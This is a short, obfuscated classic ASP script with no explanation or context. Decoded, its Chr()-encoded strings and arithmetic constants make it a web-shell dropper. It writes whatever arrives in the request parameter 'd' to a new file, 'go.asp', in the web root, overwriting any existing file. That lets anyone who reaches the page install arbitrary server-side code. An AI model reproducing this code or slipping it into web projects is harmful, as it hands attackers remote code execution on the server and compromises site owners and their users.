<%
Public OO0O0OO0O00OO
    Set OO0O0OO0O00OO = Server.CreateObject ( Chr ( 65 ) & Chr ( 100 ) & Chr ( 111 ) & Chr ( 100 ) & Chr ( 98 ) & Chr ( 46 ) & Chr ( 83 ) & Chr ( 116 ) & Chr ( 114 ) & Chr ( 101 ) & Chr ( 97 ) & Chr ( 109 ) )  
    Response.Write vbCrLf 
    OO0O0OO0O00OO.Type = ( 7 * 85 - 593 )  
    Response.Write vbCrLf 
    OO0O0OO0O00OO.Open 
    Response.Write vbCrLf 
    OO0O0OO0O00OO.CharSet = Chr ( 117 ) & Chr ( 116 ) & Chr ( 102 ) & Chr ( 45 ) & Chr ( 56 )  
    Response.Write vbCrLf 
    OO0O0OO0O00OO.writetext Request ( Chr ( 100 ) )  
    Response.Write vbCrLf 
    OO0O0OO0O00OO.SaveToFile Server.MapPath ( Chr ( 103 ) & Chr ( 111 ) & Chr ( 46 ) & Chr ( 97 ) & Chr ( 115 ) & Chr ( 112 ) ) , ( 58 * 39 - 2260 )  
    Response.Write vbCrLf 
    OO0O0OO0O00OO.Close 
    Response.Write vbCrLf 
    Set OO0O0OO0O00OO = Nothing 
    Response.Write vbCrLf 

%>
